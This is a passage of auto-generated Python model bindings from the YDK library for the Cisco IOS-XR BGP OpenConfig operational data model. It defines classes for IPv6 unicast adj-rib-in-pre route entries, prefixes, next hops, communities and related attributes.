**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-out-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre']['meta_info']
class AdjRibInPre(_Entity_):
"""
Adjacency rib in\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, self).__init__()
self.yang_name = "adj-rib-in-pre"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-in-pre"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-in-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
